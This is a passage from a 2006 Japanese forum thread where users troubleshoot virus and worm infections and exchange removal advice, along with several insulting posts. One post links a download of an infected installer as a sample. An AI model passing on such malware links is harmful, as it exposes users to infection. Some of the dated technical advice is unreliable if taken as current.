と言いたいとこなんだが、一瞬のミスや油断が命取りになると言うことはいうまでもない。
一番確実な対策はネットに繋がないってことだ。
822名無しさん@お腹いっぱい。:2006/12/16(土) 00:47:55
>>821
テクニカルな問題というよりも、普段からのセキュリティ意識の問題。
どうせ、スキャンも通信ログチェックさえもしてないんだろう。
823 ◆N9P3SuvBPo :2006/12/16(土) 01:02:59
>822
俺を舐めてるな
824名無しさん@お腹いっぱい。:2006/12/16(土) 01:09:28
>>823
んにゃ
感染してることに気づけないやつに対する、一般論だよ。
ちゃんとしている人はしているし、していない人はしていない、と言うより
意識そのものが欠落しているってこと。
825 ◆N9P3SuvBPo :2006/12/16(土) 01:22:10
>824
こっちこそすまん

ところで>822でさ、スキャンや通信ログのチェックって言ってるけど、
ルートキットと呼ばれるテクニックを使うボットが出てきて、
スキャンにもかからず、通信ログが改ざんされたりしていたら?
826名無しさん@お腹いっぱい。:2006/12/16(土) 01:24:23


    こんなメンドイんならマックにしちゃうぞ!
827名無しさん@お腹いっぱい。:2006/12/16(土) 01:28:17
>>825
そりゃ、新種を開発するやつもあの手この手を考えて、
既存の手段では対処できないのがでてくるだろうが、
俺はその手のエキスパートじゃないから、
既存のものでしか対処は出来ない。
でも、新手のものに対処できるものが開発されれば、
もちろんすぐにでも導入するよ。
俺はあくまでも、いちユーザーさ。
828名無しさん@お腹いっぱい。:2006/12/16(土) 01:37:23
初めて投稿させて頂きます。
例の起動するとドクロが出る症状にかかっています。
セーフモードで立ち上げた後にAlt+F4を連打しているのですが
ドクロが消えません。
どなたか同じ症状の方いらっしゃいませんでしょうか?^^;
829 ◆N9P3SuvBPo :2006/12/16(土) 01:38:40
マックでも感染はするよ。
Windowsより感染しにくいだけ。

>827
既存のものなら、本当に基本さえやっていれば良いと思うけど
新種のウイルスとか(上のレスで話題になってたドクロちゃん)は
色々と情報を集めたりしなければならないし…
このイタチゴッコに終わりはあるのだろうか?(ウイルス作るのも、ウイルスを駆除するのも
同じ人間がやるんだから絶対無いよな)
830 ◆N9P3SuvBPo :2006/12/16(土) 01:41:26
>828
ドクロの駆除方法は>690リンク先参照
でも基本的な解決策はリカバリ
831名無しさん@お腹いっぱい。:2006/12/16(土) 01:43:36
>>813もそうだけど(これは主に日本国内限定の監視網)
世界規模の赤米といい、徐々に(国家や組織なりがその気になれば)、
全世界規模の監視・対スパイ網が構築されつつあるように感じる。
その中で個人情報なりがどの程度把握・監視されているのかはわからないが・・・
832名無しさん@お腹いっぱい。:2006/12/16(土) 02:01:53
>>830
お返事どうもです^^
690のリンク先通りにしようとしても出来なかったのでご相談しました。
やはりリカバリしかないのでしょうか・・・orz
833 ◆N9P3SuvBPo :2006/12/16(土) 02:05:13
>832
もしかしてリカバリに自信が無いとか?
取り扱い説明書見てもピンと来ないとか?

リカバリに必要な物(リカバリディスクは持っている?
834名無しさん@お腹いっぱい。:2006/12/16(土) 02:09:50
人によっては、リカバリも出来ないほど
HDのマスター領域部分まで破壊されたと言う情報もあるぐらいだから
場合によっては、ローレベルフォーマットが必要かもね。
感染した場合どの程度まで被害が及ぶかの、
全貌がいまだはっきりとはしていない。
835名無しさん@お腹いっぱい。:2006/12/16(土) 02:13:40
ども。802です
サイトが繋がらない問題は時間を置くと繋がりました。回線に問題があったのだろうか・・・が、特定のサイトってのが引っ掛かる
>>805を見ましたがあらかたそのウイルスの症状は見られませんでした。note.exeも作成されていません
RunServicesという項目はなかた・・・まだ悪さはしてないのかな
とりあえずavastを使って隔離したチェストの感染ファイルを消去しようと思うのですが
C:\System Volume Information\_restore{09C4EF5F-CFD0-4948-AF0F-647BF97EBE38}\RP543\A0044645.exe
このようなファイルを消すとPCの動作に影響を及したりするのでしょうか?

836 ◆N9P3SuvBPo :2006/12/16(土) 02:20:35
>834
>HDのマスター領域
所謂マスターブートレコードと言う奴だろうか。

リカバリで治らないなら、山田や100ボとかの大手電気店にPCを修理に出す
という方法を取るしか…

>835
>C:\System Volume Information\_restore
システムの復元のバックアップファイルが保存されているフォルダ
一旦システムの復元を無効→即有効→再スキャンで見つからなければ良い。
ひとつ聞くけど、>802で言っていたWin32:Rbot-CXN [Trj]というウイルスは
リアルタイムで検出されたのか、手動でのスキャンによって検出されたのかどっち
検出されたとして、検出された場所はどこ?
837名無しさん@お腹いっぱい。:2006/12/16(土) 02:25:23
832です。
>>833さん
リカバリディスクを無くしてしまいまして・・・
もうこれは家電販売店に持っていくしかないですよね^^;
838名無しさん@お腹いっぱい。:2006/12/16(土) 02:29:57
>>836
それそれww
「ブート」を書いたつもりが手違いで消えたままアップしちゃった。

>>837
「取り扱い危険物」って書いてもっていけば?w
839 ◆N9P3SuvBPo :2006/12/16(土) 02:36:24
>837
リカバリディスク無くしたの?
リカバリディスクが無いとリカバリできないし(HDDにリカバリ領域がインストール
されていればリカバリディスクが無くてもリカバリは可能だが)

店員に相談してみては?

>838
マスターブートレコードの修復なら、回復コンソールでログオンして
fixmbrでできるらしいが。
840名無しさん@お腹いっぱい。:2006/12/16(土) 02:36:38
>>836
リアルタイムと手動どちらもですね。そのフォルダのファイルの方が手動で検知 バックアップってことはどちらも起源は同じなのかな
フォルダの方はローカル・ドライブを検査という操作で出てきたので良く分かりませんが、もう一つは
ttp://bbs.sjtu.edu.cn/bbstopcon?board=MusicGame&file=T.1156762308.A ここの
1.下載Synth'N の下にあるURLからダウン出来るファイルを解凍し、その中のインストーラを実行して出てくる
Synth'N.exeから検出されました。

841 ◆N9P3SuvBPo :2006/12/16(土) 02:41:46
>840
>そのフォルダのファイルの方が手動で検知
C:\System Volume Information\_restoreですよね。
これなら、システムの復元を無効→即有効で処理できます。
この後でスキャンしてウイルスが無ければ問題は無いかと。
842名無しさん@お腹いっぱい。:2006/12/16(土) 02:42:07
あ、時間がかなりかかると思うので一応現物もうpしておきます
ttp://www3.axfc.net/uploader/12/so/N12_13021.zip.html
パスはメ欄
843名無しさん@お腹いっぱい。:2006/12/16(土) 02:43:23
>>841
分かりました。試してみます
844名無しさん@お腹いっぱい。:2006/12/16(土) 02:45:35
>>839
そっかー
一番いいのは、新しくHD買って使用かな。
金はかかるが、一番手間がかからず安全確実ww
845名無しさん@お腹いっぱい。:2006/12/16(土) 03:13:00
>>841
操作の後検査してみましたが、ウイルスは検出されませんでした。ありがとうございましたm(_ _)m
846名無しさん@お腹いっぱい。:2006/12/16(土) 03:30:25
>>821
前から思ってたんですけどブラスターなども猛威をふるったからネットに繋ぐな
ってよくいわれますけど、最初ネットに繋がなきゃどうしようもないじゃないか
と思うんですが、そこはどうなっているんですか?
OSもAVも繋がないとアップデートできないでしょ。
847名無しさん@お腹いっぱい。:2006/12/16(土) 03:48:52
>>846
だからルータ導入するんだろ、外部からの接続拒否するために
848名無しさん@お腹いっぱい。:2006/12/16(土) 03:54:24
>>846
問題なのは開いている135と445ポート
ネットワークワームがこのポートを利用してネットワークサービスにバッファオーバーフローを起こして
二次的にいろいろな物をインストールする。
現在では、これらのポートに飛んで来るパケットでも、
単に以前のSasserやBlaster以外にいろんな種類のものをインストールされる。
要はファイアーウォールやルーターなどで遮断しちまえばいいだけ。
XP SP1以降ならOSに標準でファイアーウォールが付属しているだろうよ。
SP2ならさらに標準でファイアーウォールが有効になっている。

また、現状でSP2ならファイアーウォールを無効にして、
開いているそれらのポートに素通しでパケットをスルーさせてもバッファオーバーフローを起こさないから
ネットワークワームには感染しない。

つまり、外部からの勝手にアクセスしてくるパケットは遮断した状態で
即効でMicrosoftUpdateで最新の状態にしちまうのが一番安全。
849名無しさん@お腹いっぱい。:2006/12/16(土) 10:35:37
ウィルスに感染して(´・ω・`)ショボボーン
http://pc7.2ch.net/test/read.cgi/pc/1062738190/762

762 名前:名無しさん[] 投稿日:2006/12/16(土) 08:20:26 O
ZIPをスキャンしてなにもなく そのまま解凍してTXTを開いたらメディアプレイヤーの画面になって再起動とゆうより強制終了→起動を繰り返すのだがなんでかわかります?

767 名前:名無しさん[] 投稿日:2006/12/16(土) 09:49:50 O
スキャンかけるにも起動直後にプレイヤー画面→強制終了だからなにもできないのさ もう窓から放り投げるしかないかなー

??また新種か??
850名無しさん@お腹いっぱい。:2006/12/16(土) 12:36:52
>>849
readmeXE.txtのことじゃね
851名無しさん@お腹いっぱい。:2006/12/16(土) 13:12:16
>>849
ガイシュツだヴォケ
852名無しさん@お腹いっぱい。:2006/12/16(土) 17:57:42
>>848
いいたいことはだいたい分かるけどちとおれにゃ難しいな。
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

俺は入れ直しかノートンゴースト使ってるけど
853名無しさん@お腹いっぱい。:2006/12/17(日) 03:59:35
pariteに感染しましたー
854名無しさん@お腹いっぱい。:2006/12/17(日) 06:56:43
あやしいファイルを踏んでから変なメールが来たり挙動がおかしいかったので
相談したところクリーンインストールといわれ実行してからメールが来なくなりました
が、これは何のウイルスだったのでしょうか?
855名無しさん@お腹いっぱい。:2006/12/17(日) 10:35:49
>>854
知るか。
そんなのお前が知っておくべき事だろ。
856名無しさん@お腹いっぱい。:2006/12/17(日) 11:06:11
読んだつもりなのですが、過去レスに被っていたらスミマセン

【使用OS】          Win2k
【WINDOWS UPDATE】  7日前
【ウィルスソフト】      ウィルスバスター2007(恐らく感染後)
【UPDATE】         自動
【スキャン】         特になし(システム再インストール後)
【症状】            定期的にシステムファイルが壊れて起動できなくなってしまう。
【やったこと】        特に思い当たる節無し・・・
【とった処置】        今のところシステム再インストール

知人のパソコンなので、前日偶々モニターのドライバーがインストールできない相談を受けて
覗いていたのですが、次の日にシステムが立ち上がらない知らせを受け、セーフモードで
立ち上げようとしたのですがシステムファイルが壊れて立ち上がりませんでした。
その後、そのPCが本人ではなくさらに知人から頂いた物で、更に数週間前からクラッシュしては
再インストールを繰り返しているとのこと。最初はルーターのファイアーウォールをあてにして、
ウィルスソフトを入れていなかった事も後から判りました。
BIOSが書き換えられているのではないかと思い、BIOSのUPDATEを試そうかと考えていますが、
如何な物でしょうか?
857名無しさん@お腹いっぱい。:2006/12/17(日) 12:46:23
>更に数週間前からクラッシュしては
>再インストールを繰り返しているとのこと。
ウイルス以前に、HDDが逝っちゃいそうなんではないかい?
858856:2006/12/17(日) 13:32:51
確かにHDDも危険そうですが、毎回同じ壊れるファイルなので何かに常駐し居るのは
確かなようなんですが・・・

スミマセン、もう少しお伺いしたいのでAGEさせて頂きます。
859名無しさん@お腹いっぱい。:2006/12/17(日) 13:51:53
再インストールってクリーンでなくて?
或いはシステムはCドライブでデーターはDドライブとかでCをクリンインスコとか?
860名無しさん@お腹いっぱい。:2006/12/17(日) 13:58:45
たとえばこんなウイルスもあるぽ。(HDDのフォーマットでは駆除できない)

・ブートセクタ感染型ウイルス:BSI

 ハードディスクを起動するブートセクタに感染するウィルスです。
MBRを攻撃するウィルスもあり、BSIの「MBR型」と呼ばれることもあります。
ブートセクタ感染型ウイルスは既存のブートセクタを置換するか移動させます。
システムに長時間潜むものがほとんど、またブート情報を破壊したり
HDDを強制的にフォーマットさせるものもある。
 起動時に実行されて再起動できなくなる場合があるので
駆除できるまではパソコンの電源は切らないほうが良い(WindowsNT 2000 XP環境)
 システム領域(ブートセクタ、パーティションテーブル)に感染することから
「システム領域感染型」と呼ばれることもあるようです。
861名無しさん@お腹いっぱい。:2006/12/17(日) 14:33:01
>>856
メモリ不良かハードディスク不良
862856:2006/12/17(日) 14:34:05
>>859,860さん共にレス有難う御座います。

フォーマットしてからインストールしてるはずですが・・・(前回までは自分ではないので;)
因みにHDDは1ドライブで使用しております。
そういえばフートセクタ感染型もありましたね。

昨日セーフモードで起動させようとして見た段階では、
・・・\SYS32\config・・・が壊れています
というメッセージが出て止まりました。もう少しきちんと控えておけば良かったのですがorz
M/BはASUSのK7V(SlotA Athron800)で、G/BはMillennium400です。
デバイス関係のチェックはクラッシュ前のOS上、特に問題は見えませんでした。
863856:2006/12/17(日) 14:36:42
>>861
そういえばメモリチェックはしておりません。
只、光を繋ぐ前は特にトラブルもなかったようです。
864名無しさん@お腹いっぱい。:2006/12/17(日) 17:38:29
まずはHDDメーカー提供の専用ツールでチェック
問題あれば、これも専用ツールでローカルフォーマット
これで治らなければ、そのHDDは捨て
865名無しさん@お腹いっぱい。:2006/12/17(日) 20:19:59
chkdsk /r を実行かな。
866名無しさん@お腹いっぱい。:2006/12/17(日) 20:37:14
おいらは¥system32\\hal.dllがこわれてるってエラーがでて起動できないことが続いた
サポに電話してみたらやっぱhddが逝きかけてるっていわれた
>>865をやったらちょっとよくなったような希ガス

てか スレちっぽくね?
867 ◆N9P3SuvBPo :2006/12/17(日) 23:49:03
ブートセクタ感染型のウイルスって
BIOSのセットアップメニューで
ブートセクタの書き込みを「禁止」にすればいいんでないの?
868名無しさん@お腹いっぱい。:2006/12/18(月) 01:53:39
【使用OS】 XP HOME SP2
【WINDOWS UPDATE】 している
【ウィルスソフト】 ウイルスバスター2007
【UPDATE】 している
【スキャン】 二週間に一回程度
【症状】 ウイルス検索にかけたら途中で「ウイルスを駆除できません」というメッセージが4回ほど出てきました。
     検索結果にはウイルスは見当たらないと表示されました。
     その後、不定期にいきなりウィンドウズのエラー報告が表示されます。
     コンピュータすべてをウイルス検索にかけても途中で「ウイルスを駆除できません」と表示されそのまま終わってしまいます。
【やったこと】 ダウンロードしたファイルをウイルス検索にかけたら「ウイルスを駆除できません」が表示されました。
【とった処置】 無知なのでとくに何もしてません・・・。
869名無しさん@お腹いっぱい。:2006/12/18(月) 03:07:50
>>855
シネヨカス、ゴミはちゃんと答えんかい
870名無しさん@お腹いっぱい。:2006/12/18(月) 03:40:33
>>869
君の漠然とした質問に「答えろ!」というほうが無理なんだよ!!
そういう症状を引き起こすウイルスやスパイウェアが世の中に何万あると思っているんだ?
871名無しさん@お腹いっぱい。:2006/12/18(月) 03:43:14
出現から2週間ぐらいの山田やキンタマって新種?
872名無しさん@お腹いっぱい。:2006/12/18(月) 03:57:00
イメージファイルをウイルス検索できるのってビットディフェンダー以外に何がありますか?
イメージファイルを検索させたらただでさえ遅いのがむちゃくちゃ遅いですけど。
873名無しさん@お腹いっぱい。:2006/12/18(月) 04:07:13
典型的な教えて君だったなw
874名無しさん@お腹いっぱい。:2006/12/18(月) 04:36:53
ウイルスに感染しまくっている場合、競合して無力化されることはないの?
875名無しさん@お腹いっぱい。:2006/12/18(月) 04:42:44
イメージを検査するのは犯罪者ぐらいだもんな
876名無しさん@お腹いっぱい。:2006/12/18(月) 04:47:23
2chでウィルスのアドレスが時々貼られてるけど、それはどこに通報したらいいの?
877名無しさん@お腹いっぱい。:2006/12/18(月) 04:58:43
>>876
お前のママ
878名無しさん@お腹いっぱい。:2006/12/18(月) 06:29:23
連続投稿ですか?? 8回
879名無しさん@お腹いっぱい。:2006/12/18(月) 06:31:42
<<871シネヨカス

<<873オナニーでもしてろ

<<875
そりゃお前の顔だ
880名無しさん@お腹いっぱい。:2006/12/18(月) 06:33:45
                ,,-‐''""''ー--,- >>1001 遅いんだよバカ、とっとと次スレ立てろ(プゲラ
             .|"""        || >>999 何が1000だ、寝言は寝てから言え
:::::::::::::::::::::::::::      |     げ  と .|| >>998 体臭が回線を通じて匂ってきてるぞ(w
:::::::::::::::::::::::::::::::     |  1000  っ   .|| >>997 糞レスしてる暇あったら今日の寝床探せ
:::::::::::::::::::::::::::::::::::::::::::::::|       ,ノ""""'|| >>996 お前はハンバーグの材料な
  ::::::::::::::::::::::::::::::::::  |   ,/"""      .|| .>>995 深夜に空き缶拾い集める癖を直せ
::::::::::::::::::::::::::::::::::    """"        .|| .>>994 以下はiriaからやりなおせ
                       / )
                      / /|| 
                      / /. 
                    ( (     /⌒ヽ
                     ヽ ヽ⊂ ̄ ̄ ̄⊃ <ぐわっはっはっは!!!!
                      \\(´∀` )     n   ダウソ板は永遠に不滅だ!!!
                       ハ      \    ( E)
                        |     /ヽ ヽ_//   http://tmp6.2ch.net/download/
>>1001
早く次スレ立てろよ、バカ
881名無しさん@お腹いっぱい。:2006/12/18(月) 06:38:22
>>879
アンカーもまともに打てねーゴミ虫かw
882名無しさん@お腹いっぱい。:2006/12/18(月) 06:46:41
>>881自己紹介お疲れ様です   ト、 ヽ、          ,.イ i
       i  \ \  ,... -- 、 / /  i
       |   ヽ  ヽ':::::::::::__i__ヽ、/   l
        |    〉'´:::::::::::::::| 父|::::::\  i
       i  ,r'.:     \     /:`ヽi
       ゝ'         fヽ     ヘ :::ヽ
       / _     弋リ  ___ じ  :::::i/
      l    ``─     (__ノヽ__)  '´::i
       |  ̄ ̄``‐        i  i   ゚ -‐!─   カスども人様の役に立つようなことかけ
        |    _,-‐      i  i    _i__
      ヽ ‐'´         V     .::::i
       ゝ、       /}      /}.::::/
         `ゝ、    i /     { //
           (`ヽ フ/‐ゝ---'ヽ/ i
            l\ ' ノ 八 人 '´ ノ

       ∧ヽ          ,ィ´ヽ
         i ヽ ヽ、,.-─- 、 ,//   i
       l  〉´::::::::::::::::::::::::r' /    i
       | /:::::::_/_:::::::::::::::::::::::\    }
       レ'  /爻/      ::::::::\  /
      /  \  /       :::::::ヽ〈
     /  \    /       ::::::::::l
  ─-ト、   ̄     ̄   ,.-‐'´ ̄ ::::::::l
  ─‐i‐   (_人__)   ゚ ___  :::::::}  全部QAにしろ  役にたてや
   _,i-‐   i  /    ‐-、    .:::::/
     \    `´        ̄``.:::::/
      ゝfヽ    rヽ     .::::::/
883名無しさん@お腹いっぱい。:2006/12/18(月) 08:24:00
>>868
まずは何のウィルスが検索されたのか確認して、ウィルスバスターのサイトで確認
また、下手に感染しているファイルをダウンロードしたらファイル自体を削除するか、隔離すること!
884名無しさん@お腹いっぱい。:2006/12/18(月) 17:38:23
【使用OS】 Windows2000 pro
【WINDOWS UPDATE】 SP4など入れられるものは全て
【ウィルスソフト】 Avast SpybotSD マカフィーpro体験版 a-squared とっかえひっかえ試してみました
【UPDATE】 最新
【スキャン】 ウイルスバスターオンラインスキャン Avastでは検出されました 他はヌルー

【症状】 Cドライブ直下にj1ztfr6.exe p9c6f7z6x9i5.exe gj1ztho6.exe 等のファイルが現れる
そのまま起動しているとたまにDOS窓が立ち上がって上のexeが何かをしている
WINNTフォルダのalg.exe services.exe explore.exeがOS起動直後に外部にアクセスしようとする

VBオンラインでは、
WORM_SPYBOT.QL
WORM_SPYBOT.EAL
WORM_SPYBOT.DZW
WORM_AGOBOT.HN
WORM_AGOBOT.BFS
DIAL_QDIAL.AJ

がWINNTフォルダの上記exe群の中から、
またAvastがしょっちゅうWin32:Dialer BZ[trj] をCのRECYCLERから見つけてきます

【やったこと】 HDD全フォーマットして セーフモードで起動して各種ワクチンソフト、FWインストール
【とった処置】 警告が出る度に全て駆除するが効果なし 少なくとも再起動するとまた現れる
OS関連以外何一つファイルがなくても起きる
ウィンドウズアップデートで2000のSP4、IE6をインストールしようとすると高確率でエラーが出る
(「FTP.EXEは使用中です」、又は「エラーが発生したため explore.exeを終了します」)
これはセーフモードでも起きたが何度か試したらある時成功した

で、とりあえずHDD全フォーマットして2kをクリーンインストールしたんですが、インスト直後はいいものの
ネットに繋いだ瞬間にCにまた p9c6f7z6x9i5.exe などが沸きます

これは単に駆除の仕方が悪いんでしょうか それともHDD自体がフォーマットしても消えないなにかに汚染されてるんでしょうか?
885 ◆N9P3SuvBPo :2006/12/18(月) 18:20:28
>884
もしかして、ルータが無くて直でネットに繋いでいるって事かい?
886884:2006/12/18(月) 19:26:05
申し訳ありません そっちの環境を書くのを忘れてました しかも特殊なのに・・・
ここは大学寮でルータは大学の管理する鯖のほうに置いてある筈です
部屋のジャックにケーブルをつっこむだけで繋がると言う仕様です
上流ではかなりの数のポートがふさがっておりWebsenseがかましてあります

同じ回線を使っている筈の友人には同じ症状にかかった人はいないんです・・・が
887名無しさん@お腹いっぱい。:2006/12/18(月) 19:27:23
>>542さんとまったく同じ症状になってしまったのですが、解決策は無いのでしょうか・・・
同じようにセーフモードでスキャンしても見つからず、
ウィンドウのアクティブが頻繁に変わるのがきついです。
これ打ってるときも変わりまくりorz
888名無しさん@お腹いっぱい。:2006/12/18(月) 19:43:56
>>887
ツール>アドオンの管理>怪しいアドオンを無効にする
889名無しさん@お腹いっぱい。:2006/12/18(月) 19:54:37
890名無しさん@お腹いっぱい。:2006/12/18(月) 19:59:48
>>888
Win2kなのでそれが出来ないようです。
今ググっていろいろ探してますが・・・
>>889
それは既に試しましたが駄目でした。
891 ◆N9P3SuvBPo :2006/12/18(月) 20:03:08
ルータが入っているかどうか、確認する方法はたしかこれで良いか…な?

windows2000はわからないが、WindowsXPに例えると、
スタートをクリックして、ファイル名を指定して実行をクリックして、
cmdと入力してEnter。
コマンドプロンプトっていう黒い画面が起動するので、
ipconfigと入力してEnter。
IPアドレスが192以外で始まるアドレスならルータ無し。
192で始まるアドレスならルータ有り。
確認だけしてくれ。
892名無しさん@お腹いっぱい。:2006/12/18(月) 20:04:32
急にPCが重くなったからタクスマネージャのプロセス開いたらSOUNDMAN.EXEっていう見慣れないの発見
いつもよりプロセス数増えてるし・・・今スキャン中だけど調べてたらネット切れとか書いてあってがくぶる
893 ◆N9P3SuvBPo :2006/12/18(月) 20:05:36
>891は>886へのレス
894888:2006/12/18(月) 20:16:27
>>890
一応似たような事例があったので
http://bbs.higaitaisaku.com/cbbs.cgi?mode=one&number=87115&type=0&space=0&no=0

リカバリしたほうが早いかもしれんね
895884:2006/12/18(月) 20:34:55
>>891
ipconfigでは192.1681.1などはなかったです
ローカルIPしかもらってない状況なのかな

デフォルトゲートウェイ が**.*.***.1で
IPアドレスが         **.*.***.217 (*は同じ数字)
サブネットマスクは255.255.255.0
896名無しさん@お腹いっぱい。:2006/12/18(月) 20:38:02
>>892
SOUNDMAN.EXE Realtek Realtekのオーディオデバイスのインストールに含まれるプロセスで、実行時はタスクトレイに表示される。
SOUNDMAN.EXE ワーム AGOBOTワームはWindowsシステムフォルダにSOUNDMAN.EXEとして自身をコピーします。

どっちかだな
プロパティ開いてRealtek製ならセーフ
897 ◆N9P3SuvBPo :2006/12/18(月) 20:51:55
>895
ルータが入ってないって事は、ネットに繋いだ瞬間即やられるはずだ。
ファイアーウォールソフトなんて入れてない状態(>884の
>【やったこと】 HDD全フォーマットして セーフモードで起動して各種ワクチンソフト、FWインストール)
って言うので、FW付きセキュリティソフトを購入して、リカバリ。
ネットに繋ぐ前にセキュリティソフトをインストールして、FWを有効にしてからネットに
繋ぐ。もしくはルータを買ってきてルータを経由してネットに繋いで、即MU。

この手順なら大丈夫だと思う。
898名無しさん@お腹いっぱい。:2006/12/18(月) 20:53:21
>>895
>>884でやったことって、LANケーブル抜いてからやったんですよね?
899名無しさん@お腹いっぱい。:2006/12/18(月) 20:54:23
カスペなら2000も対応してるから体験版でもインスコすれば?
900名無しさん@お腹いっぱい。:2006/12/18(月) 21:35:08
>>884
ネットワークワームだ
135と445が開いているからやられる
インストールされるものはその時によりまちまち
901884:2006/12/18(月) 21:44:34
助言ありがとうございます
PC1台しかないしいいか?とルータを用意してないのが悪かったようですね
リカバリしたらできるだけオフラインで堅固な状態にしてからオンラインにしてみます

あとオフラインでカスペルを当てようとするとIEアップデートしてないので駄目なような気がしますが
IE6もSP4のようにローカルに保存してオフラインでインストールできるんでしょうか?
902 ◆N9P3SuvBPo :2006/12/18(月) 21:47:39
まあ、ネットワーク感染型ワームということは話だけで分かるんだが、
どういった手順でセキュリティソフトをインストールしたのかが知りたいわけよ。

なにしろWindowsXPみたいに標準でFW搭載されていないOSだからな>Win2K

>901
そのほうが良いかもしれんな…

オフラインでインストールはあらかじめ、インストールCDが必要だったと思う。
903名無しさん@お腹いっぱい。:2006/12/18(月) 22:00:21
904名無しさん@お腹いっぱい。:2006/12/19(火) 09:13:48
>>901
2000はSP4でもネットワークワームにやられるから
ルーターかファイアーウォールは必然
905884:2006/12/19(火) 15:45:15
Zonealarmでちびちび許可しながらインスト成功しました
今の所被害はないので大丈夫だと思います
皆様どうもでした
906素人:2006/12/19(火) 18:29:28
きのうプロバイダーから手紙が来ました。

その手紙には、私のPCから迷惑メールが送信された、もう一度やったら退会〜
などと、見に覚えの無いことが書かれていました。

どうも、自分が拡大被害の中継点になっているか、何者かに不正にアクセスされている
ようです。

普段はWEBメールを使っているのですが、一応プロバイダーのメールも設定しておこう、
と思って、Outlook Expressを開いたのですが、どうも設定できなかったので、
「おかしいな?」とは思っていました。
おそらく、なんらかのウイルスなり、不正にアクセスされているのかも知れません。
解決法を教えてください。
avast antivirusというフリーソフトを入れましたが、ウイルスのようなものは無かったみたいです。
907名無しさん@お腹いっぱい。:2006/12/19(火) 19:19:34
>>906
>OEが、どうも設定できなかった
ISPにIDとPassの変更を依頼
908名無しさん@お腹いっぱい。:2006/12/19(火) 19:30:25
AV-Test.orgによるテスト結果(2006年10月2日付)
http://www.eweek.com/article2/0,1895,2023127,00.asp

”AV-Test ran a huge test of backdoors (59,053),
bots (70,658) and trojan horses (159,971) for a total of
289,682 malware samples.”

# 1 WebWasher  99.97%  |  #21 F-Prot     77.88%
# 2 AntiVir     99.95%  |  #22 Command   77.11%
# 3 AVK 2007   99.95%  |  #23 Microsoft    76.18%
# 4 AVK 2006   99.89%  |  #24 Ewido      74.67%
# 5 Symantec   99.04%  |  #25 Sophos     65.55%
# 6 Kaspersky   98.86%  |  #26 eSafe      59.34%
# 7 F-Secure   98.24%  |  #27 UNA       58.76%
# 8 BitDefender  96.51%  |  #28 QuickHeal    55.72%
# 9 Norman    96.34%  |  #29 ClamAV     48.71%
#10 Nod32     95.80%  |  #30 eTrust-VET   48.37%

#11 Avast!     95.17%  |  #31 eTrust-INO   41.92%
#12 AVG      94.78%  |  #32 VirusBuster   40.94%
#13 Fortinet    94.65%
#14 McAfee     93.99%
#15 Rising      91.18%
#16 Panda     90.45%
#17 Dr Web    90.38%
#18 Trend Micro  90.03%
#19 Ikarus     84.77%
#20 VBA32     81.28%

VB100% award  12月の結果
・合格 Antivir, avast!, AVG, AVK 2007, eTrust, Kaspersky, McAfee, NOD32, QuickHeal, Sophos, Symantec, VirusBuster
・失格 Fortinet, Norman, Trend Micro
909名無しさん@お腹いっぱい。:2006/12/19(火) 19:33:13
>>906
てめえが感染してんだよ と
910素人:2006/12/19(火) 19:36:21
>>909
黙れカス、調子こいてんな
ウンコ野郎が
もっと長く詳しく教えろ ボケ
911名無しさん@お腹いっぱい。:2006/12/19(火) 19:37:29
(^Д^)ギャハ!↑みなさん、この人のレスどう思いますか♪なんてありきたりなんでしょうね♪
誰もが皆、一瞬つけてみたくなる発想のレスです♪
しかし、賢明な人はその自らの短絡的思考を野放しにする事を嫌がり、
こういうレスは控えます♪しかし、この人はしてしまったのです(^^;
「誰もが思い付くような事」を堂々と♪
この人にとってこのレスは何なのでしょうか♪
このレスをしている間にも時間は刻々と 過ぎ去っているのです♪
正にこの人のした事は「無意味」「無駄」でしかありません♪ああ・・・何ていう事でしょう(^^;ワラ
図星で泣いちゃうかも(^^;ワラ
912名無しさん@お腹いっぱい。:2006/12/19(火) 19:57:30
なりすましでしょ、これ
913名無しさん@お腹いっぱい。:2006/12/19(火) 20:14:54
>>911
お前の生きている時間も十分無駄だけどな
914名無しさん@お腹いっぱい。:2006/12/20(水) 01:05:00
嫁さんのPCが数日前に突然シャットダウンし、それ以降はメールを見ようとする
と、必ずパスワードを要求するようになりました。

また、妙なダイアログ(男性がPCに向ってるイメージと英文でウィルスを〜助け
るという内容のメッセージ)が時たま表示されるとも言ってます。

本人は妙なサイトを見ることはなく、メールも知人か私のものしかやり取りして
いませんが、症状からするとアドウェアのような気がします。

このようなダイアログを表示するものをご存知ないですか?

915名無しさん@お腹いっぱい。:2006/12/20(水) 01:40:55
>>914
感染していると思ったなら、ここで聞く前にまずは自分で
スパイウェアならSpybotとAd-aware入れてスキャンするなり、
ウイルスならオンラインスキャンするなりしましょうね。
そうすれば、何に感染したのかわかるから
916名無しさん@お腹いっぱい。:2006/12/20(水) 03:37:40
>>915
そうですね、こんなクズ回答ばかりならばそれもやむなしですね
917名無しさん@お腹いっぱい。:2006/12/20(水) 06:12:48
「やむなし」ねぇ・・・
そういうもんか?
セキュリティ意識の違いというか何か次元の違うものを感じるが・・・
918名無しさん@お腹いっぱい。:2006/12/20(水) 06:25:18
まず英語も読めない嫁さんをどうにかした方がいいんじゃね
919名無しさん@お腹いっぱい。:2006/12/20(水) 06:33:56
なんか、防火対策・消火対策もしていなかったのに、
火事の真っ最中に消火活動も自発的にせず、
他人に火元や火事原因を聞きまわっているようにしかみえないけどなあ。
920名無しさん@お腹いっぱい。:2006/12/20(水) 08:47:16
多分釣りなんじゃね?
921名無しさん@お腹いっぱい。:2006/12/20(水) 18:04:37
いや。プロ初心者は侮れないぞ。
聞くだけ聞いて解決したら、それで終わり。
全然学習する気がないから、同じ事を何度も訊く。
922名無しさん@お腹いっぱい。:2006/12/20(水) 19:00:46
【使用OS】XPSP2
【WINDOWS UPDATE】自動
【ウィルスソフト】avast!
【UPDATE】最新
【スキャン】できません
【症状】標準検査をしようとすると途中で強制再起動
【やったこと】スパイウェアのスキャン等など自分のわかる範囲内のことを
【とった処置】なし

最近よくフリーズしたり動作が重いのでウィルスかなんか入ってるのかな?と思いスキャンをしたところ…
必ず強制再起動させられます
わたしじゃ対処法がよくわからないので助言お願いできませんでしょうか?
923名無しさん@お腹いっぱい。:2006/12/20(水) 19:03:30
>922
>【症状】標準検査をしようとすると途中で強制再起動
セーフモードでも同じ結果になるか?
